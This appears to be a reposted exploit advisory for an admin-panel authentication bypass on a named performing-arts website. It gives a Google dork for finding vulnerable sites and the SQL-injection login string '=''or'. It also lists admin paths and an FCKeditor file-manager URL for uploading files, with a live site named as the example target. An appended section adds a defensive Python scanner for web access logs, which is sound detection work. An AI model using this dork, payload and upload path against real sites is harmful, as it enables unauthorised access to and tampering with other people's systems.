Copyright © 2014 Indian Performing Art Center Admin Control Panel ByPass Vulnerability

2018.06.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#################################################################################################

# Exploit Title : Copyright © 2014 Indian Performing Art Center Admin Control Panel ByPass Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 08/06/2018
# Vendor Homepage : ipacglobal.com
# Social Media Page : facebook.com/India-Performing-Arts-Center-249492318418992/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
* CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ]
* CWE-592 [ Authentication Bypass Issues ]

#################################################################################################

# Google Dork : intext:''Copyright © 2014- All Rights Reserved Press| Indian Performing Art Center ::''

# Admin Panel Login Path : /admin

# Exploit : Login both for admin username and password as => '=''or'

# Possible Admin Control Panel Useable URL Paths :

/admin/editpages.php
/admin/editpages.php?id=1
/admin/editpages.php?id=2
/admin/editpages.php?id=3
/admin/editpages.php?id=4
/admin/editpages.php?id=5
/admin/editpages.php?id=6
/admin/editpages.php?id=7
/admin/editpages.php?id=8
/admin/editpages.php?id=9
/admin/editpages.php?id=10
/admin/editpages.php?id=11
/admin/editpages.php?id=12
/admin/addcategory.php
/admin/gallery.php?g_id=1
/admin/gallery.php?g_id=13
/admin/gallery.php?g_id=14
/admin/event.php
/admin/event.php?addcat=addcat
/admin/event.php?edit=edit&catid=1
/admin/videos.php
/admin/videos.php?addcat=addcat
/admin/videos.php?edit=edit&catid=1
/admin/fogana.php
/admin/fogana.php?edit=edit&fogana=1
/admin/addtestmoni.php
/admin/testimonials.php?edit=edit&catid=9

Add Image => /admin/addimage.php?action=add&g_id=1

Edit Image with Height and Width

/admin/edit.php?g_id=1&action=del&pid=1&height=200&width=350

PATH => /products/flash/....

#################################################################################################

FCKEditor Vulnerability [ You can select File ~ Image ~ Flash ~ Media ]

/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http.//TARGETSITE/admin/fckeditor/editor/filemanager/connectors/php/Fconnector.php

PATH => /admin/images/image/.....

PATH => /admin/images/file/....

#################################################################################################

# Example Site => ipacglobal.com

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
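Added example, not part of the original advisory: a check a site operator can run over web access logs to find requests that reached the FCKeditor file manager or fetched script-like files from the upload directories listed above. The Combined Log Format, the list of executable extensions and the sample log lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths taken from the advisory text.
FILEMANAGER = "/admin/fckeditor/editor/filemanager/"
UPLOAD_DIRS = ("/admin/images/image/", "/admin/images/file/", "/products/flash/")
# Assumption: extensions this PHP host would execute; match double extensions too.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
# Combined Log Format: client - user [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return (client, reason) for a request worth reviewing, else None."""
    m = LINE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    if path.startswith(FILEMANAGER):
        if "connector" in {k.lower() for k in parse_qs(url.query)}:
            return client, "file browser opened with explicit Connector parameter"
        if "/connectors/" in path and method == "POST" and status.startswith("2"):
            return client, "POST accepted by file manager connector"
        return client, "file manager reached"
    if path.startswith(UPLOAD_DIRS) and SCRIPT_EXT.search(path):
        return client, "script-like file requested from upload directory"
    return None

def scan(lines):
    hits = {}
    for line in lines:
        hit = classify(line)
        if hit:
            hits.setdefault(hit[0], []).append(hit[1])
    return hits

FM = "/admin/fckeditor/editor/filemanager"
SAMPLE_LOG = [  # constructed lines, documentation-range addresses
    '192.0.2.10 - - [08/Jun/2018:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [08/Jun/2018:10:00:02 +0000] "GET /admin/images/image/banner.jpg HTTP/1.1" 200 9000',
    f'203.0.113.7 - - [08/Jun/2018:10:02:11 +0000] "GET {FM}/browser/default/browser.html?Type=Image&Connector={FM}/connectors/php/Fconnector.php HTTP/1.1" 200 2048',
    f'203.0.113.7 - - [08/Jun/2018:10:02:40 +0000] "POST {FM}/connectors/php/Fconnector.php HTTP/1.1" 200 120',
    '198.51.100.23 - - [08/Jun/2018:10:05:00 +0000] "GET /admin/images/file/sample.php.jpg HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG).items():
        print(client, reasons)
```

Any hit on the file manager from an address that is not a known administrator is worth reviewing together with the contents of the upload directories.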



Copyright 2018, cxsecurity.com

 
